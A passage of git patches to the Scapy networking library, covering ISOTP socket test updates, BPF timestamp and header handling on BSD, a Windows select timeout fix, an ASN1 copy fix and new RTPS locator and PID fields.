0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) @@ -508,7 +587,7 @@ assert(len(isotp) == 0) = Check if not sending the first CF will make the socket timeout -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) isotp = s.sniff(timeout=0.1) @@ -516,22 +595,24 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as assert(len(isotp) == 0) = Check if not sending the first FC will make the socket timeout -exception = None + +# drain log_stream +log_stream.getvalue() + isotp = ISOTP(data=dhex("01 02 03 04 05 06 07 08 09 0A")) -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) - try: - s.send(isotp) - assert(False) - except Scapy_Exception as ex: - exception = ex + s.send(isotp) + time.sleep(1.3) -assert(str(exception) == "TX state was reset due to timeout") +assert "TX state was reset due to timeout" in log_stream.getvalue() = Check if not sending the second FC will make the socket timeout -exception = None +# drain log_stream +log_stream.getvalue() + isotp = ISOTP(data=b"\xa5" * 120) cans = TestSocket(CAN) isocan = TestSocket(CAN) @@ -541,23 +622,19 @@ acker = AsyncSniffer(store=False, opened_socket=cans, prn=lambda x: cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))), count=1, timeout=1) acker.start() -with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - try: - s.send(isotp) - except Scapy_Exception as ex: - exception = ex +with ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s: + s.send(isotp) + time.sleep(1.3) acker.join(timeout=5) cans.close() isocan.close() -assert(exception is not None) -print(exception) -assert(str(exception) == "TX state was reset due to timeout") +assert "TX state was reset due to timeout" in log_stream.getvalue() = Check if reception of an overflow FC will make a send fail -exception = None +log_stream.getvalue() isotp = ISOTP(data=b"\xa5" * 120) cans = TestSocket(CAN) isocan = TestSocket(CAN) @@ -569,18 +646,15 @@ acker = AsyncSniffer(store=False, opened_socket=cans, count=1, timeout=1) acker.start() -with ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - try: - s.send(isotp) - except Scapy_Exception as ex: - exception = ex +with ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s: + s.send(isotp) + time.sleep(1.3) acker.join(timeout=5) cans.close() isocan.close() -assert(exception is not None) -assert(str(exception) == "Overflow happened at the receiver side") +assert "Overflow happened at the receiver side" in log_stream.getvalue() + More complex operations @@ -639,10 +713,10 @@ with TestSocket(CAN) as can0_0, \ TestSocket(CAN) as can0_1, \ TestSocket(CAN) as can1_0, \ TestSocket(CAN) as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x141, did=0x141) as bSocket1: + ISOTPSoftSocket(can0_0, tx_id=0x241, rx_id=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, tx_id=0x541, rx_id=0x141) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, tx_id=0x641, rx_id=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, tx_id=0x141, rx_id=0x141) as bSocket1: can0_0.pair(can0_1) can1_1.pair(can1_0) evt = threading.Event() @@ -653,13 +727,13 @@ with TestSocket(CAN) as can0_0, \ def bridge(): global forwarded, succ forwarded = 0 - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=1.5, started_callback=evt.set, count=1) succ = True threadBridge = threading.Thread(target=bridge) threadBridge.start() evt.wait(timeout=5) - packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) + packetsVCan1 = isoTpSocket1.sniff(timeout=1.5, count=1, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) threadBridge.join(timeout=5) assert not threadBridge.is_alive() @@ -677,10 +751,10 @@ with TestSocket(CAN) as can0_0, \ TestSocket(CAN) as can0_1, \ TestSocket(CAN) as can1_0, \ TestSocket(CAN) as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x141, did=0x541) as bSocket1: + ISOTPSoftSocket(can0_0, tx_id=0x241, rx_id=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, tx_id=0x541, rx_id=0x141) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, tx_id=0x641, rx_id=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, tx_id=0x141, rx_id=0x541) as bSocket1: can0_0.pair(can0_1) can1_1.pair(can1_0) evt = threading.Event() @@ -715,10 +789,10 @@ with TestSocket(CAN) as can0_0, \ TestSocket(CAN) as can0_1, \ TestSocket(CAN) as can1_0, \ TestSocket(CAN) as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x641, did=0x241) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x241, did=0x641) as bSocket1: + ISOTPSoftSocket(can0_0, tx_id=0x241, rx_id=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, tx_id=0x641, rx_id=0x241) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, tx_id=0x641, rx_id=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, tx_id=0x241, rx_id=0x641) as bSocket1: can0_0.pair(can0_1) can1_1.pair(can1_0) evt = threading.Event() @@ -743,8 +817,8 @@ assert succ = Two ISOTPSoftSockets at the same time, sending and receiving -with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ - TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, tx_id=0x241, rx_id=0x641) as s2: cs1.pair(cs2) isotp = ISOTP(data=b"\x10\x25" * 43) s2.send(isotp) @@ -756,8 +830,8 @@ assert(result[0].data == isotp.data) = Two ISOTPSoftSockets at the same time, sending and receiving with tx_gap -with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ - TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, stmin=1) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, tx_id=0x241, rx_id=0x641) as s2: cs1.pair(cs2) isotp = ISOTP(data=b"\x10\x25" * 43) s2.send(isotp) @@ -768,29 +842,36 @@ assert(result[0].data == isotp.data) = Two ISOTPSoftSockets at the same time, multiple sends/receives -with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ - TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: - cs1.pair(cs2) - for i in range(1, 40, 5): - isotp = ISOTP(data=bytearray(range(i, i * 2))) - s2.send(isotp) - result = s1.sniff(count=8, timeout=5) - -assert len(result) == 8 - +def test(): + with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241) as s1, \ + TestSocket(CAN) as cs2, ISOTPSoftSocket(cs2, tx_id=0x241, rx_id=0x641) as s2: + cs1.pair(cs2) + for i in range(1, 40, 5): + isotp = ISOTP(data=bytearray(range(i, i * 2))) + s2.send(isotp) + result = s1.sniff(count=8, timeout=5) + print(result) + for p in result: + print(repr(p)) + assert len(result) == 8 + +test() = Send a single frame ISOTP message with padding -with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, padding=True) as s: +with TestSocket(CAN) as cs1, ISOTPSoftSocket(cs1, tx_id=0x641, rx_id=0x241, padding=True) as s: with TestSocket(CAN) as cans: cs1.pair(cans) s.send(ISOTP(data=dhex("01"))) - res = cans.sniff(timeout=1, count=1)[0] - assert(res.length == 8) + pkts = cans.sniff(timeout=1, count=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] + assert(res.length == 8) = Send a two-frame ISOTP message with padding -~ disabled acks = TestSocket(CAN) cans = TestSocket(CAN) @@ -802,7 +883,7 @@ def send_ack(x): acker = AsyncSniffer(opened_socket=acks, store=False, prn=send_ack, timeout=1, count=1) acker.start() -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=True) as s: acks.pair(isocan) cans.pair(isocan) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) @@ -819,58 +900,77 @@ assert(canpks[2].data == dhex("21 07 08 CC CC CC CC CC")) = Receive a padded single frame ISOTP message with padding disabled -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=False) as s: with TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] assert(res.data == dhex("05 06")) = Receive a padded single frame ISOTP message with padding enabled -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=True) as s: with TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] assert(res.data == dhex("05 06")) = Receive a non-padded single frame ISOTP message with padding enabled -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=True) as s: with TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) - res = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=2) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] assert(res.data == dhex("05 06")) = Receive a padded two-frame ISOTP message with padding enabled -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=True) as s: with TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) - = Receive a padded two-frame ISOTP message with padding disabled -with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241, padding=False) as s: with TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.sniff(count=1, timeout=1)[0] + pkts = s.sniff(count=1, timeout=1) + if not len(pkts): + s.failure_analysis() + raise Scapy_Exception("ERROR") + res = pkts[0] res.show() assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + Cleanup -= Cleanup reference to ISOTPSoftSocket to let the thread end -s = None += Delete testsockets -= Delete vcan interfaces - -assert cleanup_interfaces() cleanup_testsockets() + +TimeoutScheduler.clear() + +log_runtime.removeHandler(handler) From 65089071da1acf54622df0b4fa7fc7673d47d3cd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 8 Jan 2022 14:57:19 +0100 Subject: [PATCH 0724/1632] Fix High CPU Windows --- scapy/automaton.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index fa1875ded20..df487a96fd5 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -95,7 +95,8 @@ def select_objects(inputs, remain): if natives: results = results.union(set(select.select(natives, [], [], remain)[0])) if events: - remainms = int((remain or 0) * 1000) + # 0xFFFFFFFF = INFINITE + remainms = int(remain * 1000 if remain else 0xFFFFFFFF) if len(events) == 1: res = ctypes.windll.kernel32.WaitForSingleObject( ctypes.c_void_p(events[0].fileno()), From adaa923db82be88e5bd84b4046faa23f2b69d0ed Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 8 Jan 2021 17:03:44 +0100 Subject: [PATCH 0725/1632] Major BPF improvements This adds: - timestamps support - structures of bpf_hdr - nanosecond precision on FREEBSD - cleanups --- doc/scapy/troubleshooting.rst | 11 ++- scapy/arch/bpf/consts.py | 53 +++++++++---- scapy/arch/bpf/supersocket.py | 138 ++++++++++++++++++++++------------ scapy/arch/linux.py | 6 +- scapy/arch/windows/native.py | 4 +- 5 files changed, 142 insertions(+), 70 deletions(-) diff --git a/doc/scapy/troubleshooting.rst b/doc/scapy/troubleshooting.rst index 253f6f0e14e..3025e3c097d 100644 --- a/doc/scapy/troubleshooting.rst +++ b/doc/scapy/troubleshooting.rst @@ -10,10 +10,15 @@ I can't sniff/inject packets in monitor mode. The use monitor mode varies greatly depending on the platform. -- **Windows or *BSD or conf.use_pcap = True** +- **Using Libpcap** ``libpcap`` must be called differently by Scapy in order for it to create the sockets in monitor mode. You will need to pass the ``monitor=True`` to any calls that open a socket (``send``, ``sniff``...) or to a Scapy socket that you create yourself (``conf.L2Socket``...) -- **Native Linux (with pcap disabled):** - You should set the interface in monitor mode on your own. Scapy provides utilitary functions: ``set_iface_monitor`` and ``get_iface_mode`` (linux only), that may be used (they do system calls to ``iwconfig`` and will restart the adapter). +- **Native Linux (with libpcap disabled):** + You should set the interface in monitor mode on your own. I personally like + to use iwconfig for that (replace ``monitor`` by ``managed`` to disable):: + + $ sudo ifconfig IFACE down + $ sudo iwconfig IFACE mode monitor + $ sudo ifconfig IFACE up **If you are using Npcap:** please note that Npcap ``npcap-0.9983`` broke the 802.11 util back in 2019. It has yet to be fixed (as of Npcap 0.9994) so in the meantime, use `npcap-0.9982.exe `_ diff --git a/scapy/arch/bpf/consts.py b/scapy/arch/bpf/consts.py index 92697d6511a..7bf4867e979 100644 --- a/scapy/arch/bpf/consts.py +++ b/scapy/arch/bpf/consts.py @@ -4,24 +4,51 @@ Scapy BSD native support - constants """ -from ctypes import sizeof +import ctypes from scapy.libs.structures import bpf_program from scapy.data import MTU - SIOCGIFFLAGS = 0xc0206911 BPF_BUFFER_LENGTH = MTU +# From sys/ioccom.h + +IOCPARM_MASK = 0x1fff +IOC_VOID = 0x20000000 +IOC_OUT = 0x40000000 +IOC_IN = 0x80000000 +IOC_INOUT = IOC_IN | IOC_OUT + +_th = lambda x: x if isinstance(x, int) else ctypes.sizeof(x) + + +def _IOC(inout, group, num, len): + return (inout | + ((_th(len) & IOCPARM_MASK) << 16) | + (ord(group) << 8) | (num)) + + +_IO = lambda g, n: _IOC(IOC_VOID, g, n, 0) +_IOR = lambda g, n, t: _IOC(IOC_OUT, g, n, t) +_IOW = lambda g, n, t: _IOC(IOC_IN, g, n, t) +_IOWR = lambda g, n, t: _IOC(IOC_INOUT, g, n, t) + +# Length of some structures +_bpf_stat = 8 +_ifreq = 32 + # From net/bpf.h -BIOCIMMEDIATE = 0x80044270 -BIOCGSTATS = 0x4008426f -BIOCPROMISC = 0x20004269 -BIOCSETIF = 0x8020426c -BIOCSBLEN = 0xc0044266 -BIOCGBLEN = 0x40044266 -BIOCSETF = 0x80004267 | ((sizeof(bpf_program) & 0x1fff) << 16) -BIOCSDLT = 0x80044278 -BIOCSHDRCMPLT = 0x80044275 -BIOCGDLT = 0x4004426a -DLT_IEEE802_11_RADIO = 127 +BIOCGBLEN = _IOR('B', 102, ctypes.c_uint) +BIOCSBLEN = _IOWR('B', 102, ctypes.c_uint) +BIOCSETF = _IOW('B', 103, bpf_program) +BIOCPROMISC = _IO('B', 105) +BIOCGDLT = _IOR('B', 106, ctypes.c_uint) +BIOCSETIF = _IOW('B', 108, 32) +BIOCGSTATS = _IOR('B', 111, _bpf_stat) +BIOCIMMEDIATE = _IOW('B', 112, ctypes.c_uint) +BIOCSHDRCMPLT = _IOW('B', 117, ctypes.c_uint) +BIOCSDLT = _IOW('B', 120, ctypes.c_uint) +BIOCSTSTAMP = _IOW('B', 132, ctypes.c_uint) + +BPF_T_NANOTIME = 0x0001 diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 624bd74e246..1d89ed2d0e7 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -4,40 +4,78 @@ Scapy *BSD native support - BPF sockets """ -from ctypes import c_long, sizeof +from select import select +import ctypes import errno import fcntl import os import platform -from select import select import struct import sys import time from scapy.arch.bpf.core import get_dev_bpf, attach_filter -from scapy.arch.bpf.consts import BIOCGBLEN, BIOCGDLT, BIOCGSTATS, \ - BIOCIMMEDIATE, BIOCPROMISC, BIOCSBLEN, BIOCSETIF, BIOCSHDRCMPLT, \ - BPF_BUFFER_LENGTH, BIOCSDLT, DLT_IEEE802_11_RADIO +from scapy.arch.bpf.consts import ( + BIOCGBLEN, + BIOCGDLT, + BIOCGSTATS, + BIOCIMMEDIATE, + BIOCPROMISC, + BIOCSBLEN, + BIOCSDLT, + BIOCSETIF, + BIOCSHDRCMPLT, + BIOCSTSTAMP, + BPF_BUFFER_LENGTH, + BPF_T_NANOTIME, +) from scapy.config import conf -from scapy.consts import FREEBSD, NETBSD, DARWIN -from scapy.data import ETH_P_ALL +from scapy.consts import DARWIN, FREEBSD, NETBSD +from scapy.data import ETH_P_ALL, DLT_IEEE802_11_RADIO from scapy.error import Scapy_Exception, warning from scapy.interfaces import network_name from scapy.supersocket import SuperSocket from scapy.compat import raw +# Structures & c types -if FREEBSD: +if FREEBSD or NETBSD: # On 32bit architectures long might be 32bit. - BPF_ALIGNMENT = sizeof(c_long) + BPF_ALIGNMENT = ctypes.sizeof(ctypes.c_long) +else: + # DARWIN, OPENBSD + BPF_ALIGNMENT = ctypes.sizeof(ctypes.c_int32) + +_NANOTIME = FREEBSD # Kinda disappointing availability TBH + +if _NANOTIME: + class bpf_timeval(ctypes.Structure): + # actually a bpf_timespec + _fields_ = [("tv_sec", ctypes.c_ulong), + ("tv_nsec", ctypes.c_ulong)] elif NETBSD: - BPF_ALIGNMENT = 8 # sizeof(long) + class bpf_timeval(ctypes.Structure): + _fields_ = [("tv_sec", ctypes.c_ulong), + ("tv_usec", ctypes.c_ulong)] else: - BPF_ALIGNMENT = 4 # sizeof(int32_t) + class bpf_timeval(ctypes.Structure): + _fields_ = [("tv_sec", ctypes.c_uint32), + ("tv_usec", ctypes.c_uint32)] +class bpf_hdr(ctypes.Structure): + # Also called bpf_xhdr on some OSes + _fields_ = [("bh_tstamp", bpf_timeval), + ("bh_caplen", ctypes.c_uint32), + ("bh_datalen", ctypes.c_uint32), + ("bh_hdrlen", ctypes.c_uint16)] + + +_bpf_hdr_len = ctypes.sizeof(bpf_hdr) + # SuperSockets definitions + class _L2bpfSocket(SuperSocket): """"Generic Scapy BPF Super Socket""" @@ -46,14 +84,19 @@ class _L2bpfSocket(SuperSocket): def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilter=0, monitor=False): + if monitor: + raise Scapy_Exception( + "We do not natively support monitor mode on BPF. " + "Please turn on libpcap using conf.use_pcap = True" + ) + self.fd_flags = None self.assigned_interface = None # SuperSocket mandatory variables if promisc is None: - self.promisc = conf.sniff_promisc - else: - self.promisc = promisc + promisc = conf.sniff_promisc + self.promisc = promisc self.iface = network_name(iface or conf.iface) @@ -62,16 +105,32 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, (self.ins, self.dev_bpf) = get_dev_bpf() self.outs = self.ins + if FREEBSD: + # Set the BPF timeval format. Availability issues here ! + try: + fcntl.ioctl( + self.ins, BIOCSTSTAMP, + struct.pack('I', BPF_T_NANOTIME) + ) + except IOError: + raise Scapy_Exception("BIOCSTSTAMP failed on /dev/bpf%i" % + self.dev_bpf) # Set the BPF buffer length try: - fcntl.ioctl(self.ins, BIOCSBLEN, struct.pack('I', BPF_BUFFER_LENGTH)) # noqa: E501 + fcntl.ioctl( + self.ins, BIOCSBLEN, + struct.pack('I', BPF_BUFFER_LENGTH) + ) except IOError: raise Scapy_Exception("BIOCSBLEN failed on /dev/bpf%i" % self.dev_bpf) # Assign the network interface to the BPF handle try: - fcntl.ioctl(self.ins, BIOCSETIF, struct.pack("16s16x", self.iface.encode())) # noqa: E501 + fcntl.ioctl( + self.ins, BIOCSETIF, + struct.pack("16s16x", self.iface.encode()) + ) except IOError: raise Scapy_Exception("BIOCSETIF failed on %s" % self.iface) self.assigned_interface = self.iface @@ -287,51 +346,34 @@ def bpf_align(bh_h, bh_c): return ((bh_h + bh_c) + (BPF_ALIGNMENT - 1)) & ~(BPF_ALIGNMENT - 1) def extract_frames(self, bpf_buffer): - """Extract all frames from the buffer and stored them in the received list.""" # noqa: E501 + """ + Extract all frames from the buffer and stored them in the received list + """ # Ensure that the BPF buffer contains at least the header len_bb = len(bpf_buffer) - if len_bb < 20: # Note: 20 == sizeof(struct bfp_hdr) + if len_bb < _bpf_hdr_len: return # Extract useful information from the BPF header - if FREEBSD: - # Unless we set BIOCSTSTAMP to something different than - # BPF_T_MICROTIME, we will get bpf_hdr on FreeBSD, which means - # that we'll get a struct timeval, which is time_t, suseconds_t. - # On i386 time_t is 32bit so the bh_tstamp will only be 8 bytes. - # We really want to set BIOCSTSTAMP to BPF_T_NANOTIME and be - # done with this and it always be 16? - if platform.machine() == "i386": - # struct bpf_hdr - bh_tstamp_offset = 8 - else: - # struct bpf_hdr (64bit time_t) or struct bpf_xhdr - bh_tstamp_offset = 16 - elif NETBSD: - # struct bpf_hdr or struct bpf_hdr32 - bh_tstamp_offset = 16 - else: - # struct bpf_hdr - bh_tstamp_offset = 8 - - # Parse the BPF header - bh_caplen = struct.unpack('I', bpf_buffer[bh_tstamp_offset:bh_tstamp_offset + 4])[0] # noqa: E501 - next_offset = bh_tstamp_offset + 4 - bh_datalen = struct.unpack('I', bpf_buffer[next_offset:next_offset + 4])[0] # noqa: E501 - next_offset += 4 - bh_hdrlen = struct.unpack('H', bpf_buffer[next_offset:next_offset + 2])[0] # noqa: E501 - if bh_datalen == 0: + bh_hdr = bpf_hdr.from_buffer_copy(bpf_buffer) + if bh_hdr.bh_datalen == 0: return # Get and store the Scapy object - frame_str = bpf_buffer[bh_hdrlen:bh_hdrlen + bh_caplen] + frame_str = bpf_buffer[ + bh_hdr.bh_hdrlen:bh_hdr.bh_hdrlen + bh_hdr.bh_caplen + ] + if _NANOTIME: + ts = bh_hdr.bh_tstamp.tv_sec + 1e-9 * bh_hdr.bh_tstamp.tv_nsec + else: + ts = bh_hdr.bh_tstamp.tv_sec + 1e-6 * bh_hdr.bh_tstamp.tv_usec self.received_frames.append( - (self.guessed_cls, frame_str, None) + (self.guessed_cls, frame_str, ts) ) # Extract the next frame - end = self.bpf_align(bh_hdrlen, bh_caplen) + end = self.bpf_align(bh_hdr.bh_hdrlen, bh_hdr.bh_caplen) if (len_bb - end) >= 20: self.extract_frames(bpf_buffer[end:]) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index b86e98abf86..11ba2bd5199 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -65,7 +65,7 @@ Union, ) -# From bits/ioctls.h +# From sockios.h SIOCGIFHWADDR = 0x8927 # Get hardware address SIOCGIFADDR = 0x8915 # get PA address SIOCGIFNETMASK = 0x891b # get network PA mask @@ -483,10 +483,6 @@ def __init__(self, self.iface = network_name(iface or conf.iface) self.type = type self.promisc = conf.sniff_promisc if promisc is None else promisc - if monitor is not None: - log_runtime.info( - "The 'monitor' argument has no effect on native linux sockets." - ) self.ins = socket.socket( socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 0) diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index e4dc4c38c8a..0d718a82063 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -68,7 +68,7 @@ class L3WinSocket(SuperSocket): __slots__ = ["promisc", "cls", "ipv6", "proto"] def __init__(self, iface=None, proto=socket.IPPROTO_IP, - ttl=128, ipv6=False, promisc=True, **kwargs): + ttl=128, ipv6=False, promisc=None, **kwargs): from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 for kwarg in kwargs: @@ -85,6 +85,8 @@ def __init__(self, iface=None, proto=socket.IPPROTO_IP, # On Windows, with promisc=False, you won't get much self.ipv6 = ipv6 self.cls = IPv6 if ipv6 else IP + if promisc is None: + promisc = conf.sniff_promisc self.promisc = promisc # Notes: # - IPPROTO_RAW only works to send packets. From 69dde195a56546913bd740a90e32c0d89112c0d6 Mon Sep 17 00:00:00 2001 From: fouzhe <862006904@qq.com> Date: Mon, 31 Jan 2022 05:43:20 +0800 Subject: [PATCH 0726/1632] Fix do_copy() of class ASN1F_field (#3477) * Fix do_copy() of class ASN1F_field * fix mypy --- scapy/asn1fields.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 314fb06989f..98ee7a6c408 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -200,13 +200,14 @@ def dissect(self, pkt, s): def do_copy(self, x): # type: (Any) -> Any - if hasattr(x, "copy"): - return x.copy() if isinstance(x, list): x = x[:] for i in range(len(x)): if isinstance(x[i], BasePacket): x[i] = x[i].copy() + return x + if hasattr(x, "copy"): + return x.copy() return x def set_val(self, pkt, val): From 34c5f60f8fe0633d4000d1a32f26bbf28ee0229b Mon Sep 17 00:00:00 2001 From: Federico Maggi Date: Sun, 30 Jan 2022 22:44:00 +0100 Subject: [PATCH 0727/1632] [RTPS contrib] New RTI proprietary PIDs (#3475) * [RTPS contrib] New RTI proprietary PIDs Signed-off-by: Federico Maggi * Added GurumNetworks Signed-off-by: Federico Maggi * Sentinel is needed in InlineQoS Signed-off-by: Federico Maggi * This is the right way to implement InlineQoS Signed-off-by: Federico Maggi --- scapy/contrib/rtps/common_types.py | 42 ++- scapy/contrib/rtps/pid_types.py | 158 +++++++++- scapy/contrib/rtps/rtps.py | 7 +- test/contrib/rtps/rtps.uts | 448 ++++++++++++++++++++++------- 4 files changed, 543 insertions(+), 112 deletions(-) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index fc5dbc49fb2..95d00706dd8 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -26,6 +26,7 @@ from scapy.fields import ( BitField, + ConditionalField, EnumField, ByteField, IntField, @@ -36,6 +37,7 @@ StrField, StrLenField, XIntField, + XStrFixedLenField, ) from scapy.packet import Packet, fuzz @@ -211,18 +213,49 @@ def extract_padding(self, p): return b"", p -class LocatorPacket(Packet): +class LocatorPacket(EPacket): name = "RTPS Locator" fields_desc = [ - XIntField("locatorKind", 0), - LEIntField("port", 0), - ReversePadField(IPField("address", "0.0.0.0"), 20), + EField( + XIntField("locatorKind", 0), + endianness=FORMAT_LE, + endianness_from=None), + EField( + IntField("port", 0), + endianness=FORMAT_LE, + endianness_from=None), + ConditionalField( + ReversePadField(IPField("address", "0.0.0.0"), 20), + lambda p: p.locatorKind == 0x1 + ), + ConditionalField( + XStrFixedLenField("hostId", 0x0, 16), + lambda p: p.locatorKind == 0x01000000 + ) ] def extract_padding(self, p): return b"", p +class ProductVersionPacket(EPacket): + name = "Product Version" + fields_desc = [ + ByteField("major", 0), + ByteField("minor", 0), + ByteField("release", 0), + ByteField("revision", 0), + ] + + +class 